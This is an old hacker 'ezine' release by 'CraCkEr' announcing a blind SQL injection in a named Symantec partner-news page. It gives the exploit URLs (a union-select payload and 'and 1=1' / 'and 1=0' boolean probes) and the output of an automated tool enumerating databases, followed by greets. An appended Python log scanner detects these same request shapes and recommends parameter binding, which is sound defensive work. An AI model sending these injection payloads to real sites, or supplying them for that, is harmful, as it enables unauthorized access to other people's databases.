┌───────────────────────────────────────────────────────────────────────────┐
│                               C r a C k E r                               │
│                T H E C R A C K O F E T E R N A L M I G H T                │
└───────────────────────────────────────────────────────────────────────────┘

     ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐

┌───────────────────────────────────────────────────────────────────────────┐
│                                 [ EZINE ]                                 │
└───────────────────────────────────────────────────────────────────────────┘

  Author    : CraCkEr
  Website   : symantec.com
  Vuln Type : Blind SQL Injection
  Method    : GET
  Critical  : High [░░▒▒▓▓██]
  Impact    : Database access

  Famous Sites Can Be Also Vulned

  DALnet #crackers

  Release Notes:
  ═════════════
  Typically used for remotely exploitable vulnerabilities that can lead to
  system compromise.

┌───────────────────────────────────────────────────────────────────────────┐
│                               Exploit URLs                                │
└───────────────────────────────────────────────────────────────────────────┘

[+] Remote SQL

http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3--

[+] Blind SQL

http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0

[+] Text Change

Bedriftsfordelene ved sosiale nettverk

[+] Attack Results

[+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 18:00:05
[+] Number of Rows: 85

[-] 00:58:04
[-] Total URL Requests 10602
[-] Done

Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

┌───────────────────────────────────────────────────────────────────────────┐
│                              © CraCkEr 2008                               │
└───────────────────────────────────────────────────────────────────────────┘
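
An added example, not part of the original release: a log check for the request shapes listed under the exploit URLs (a `union select` value and an `and 1=1` / `and 1=0` pair in `l`), assuming `l` should only ever hold an integer. The log lines, client addresses and response sizes are constructed, and the function names are hypothetical.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format, documentation-range IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Dec/2008:18:00:01 +0100] "GET /2008/03/index.php?p=lp&l=1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Dec/2008:18:00:02 +0100] "GET /2008/03/index.php?p=lp&l=1%20and%201=1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Dec/2008:18:00:02 +0100] "GET /2008/03/index.php?p=lp&l=1%20and%201=0 HTTP/1.1" 200 4310
198.51.100.7 - - [01/Dec/2008:18:00:03 +0100] "GET /2008/03/index.php?p=lp&l=-1+union+select+1,2,3-- HTTP/1.1" 200 4400
192.0.2.10 - - [01/Dec/2008:18:00:04 +0100] "GET /2008/03/index.php?p=lp&l=2 HTTP/1.1" 200 5300
"""

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')
RULES = [  # checked in order; the first match names the finding
    ("union-select", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("boolean-test", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def classify(value):
    """Return None for a plain integer, else a label for the anomaly."""
    if re.fullmatch(r"-?\d+", value):
        return None
    for label, rx in RULES:
        if rx.search(value):
            return label
    return "non-integer"

def scan(log_text, param="l"):
    """Per client: anomaly counts, plus whether boolean tests got differing bodies."""
    counts, sizes = defaultdict(Counter), defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, size = m.group(1), m.group(2), int(m.group(4))
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            label = classify(value.strip())
            if label:
                counts[client][label] += 1
                if label == "boolean-test":
                    sizes[client].add(size)
    # Differing sizes for true/false probes suggest the input reaches the query.
    return {c: {"counts": dict(counts[c]), "differential": len(sizes[c]) > 1}
            for c in counts}

if __name__ == "__main__":
    for client, result in scan(SAMPLE_LOG).items():
        print(client, result)
```

A client with `differential` set is the one to triage first: the true and false conditions produced different pages, which is the "Text Change" behaviour the release relies on. The lasting fix is on the application side, binding `l` as an integer parameter instead of concatenating it into the query.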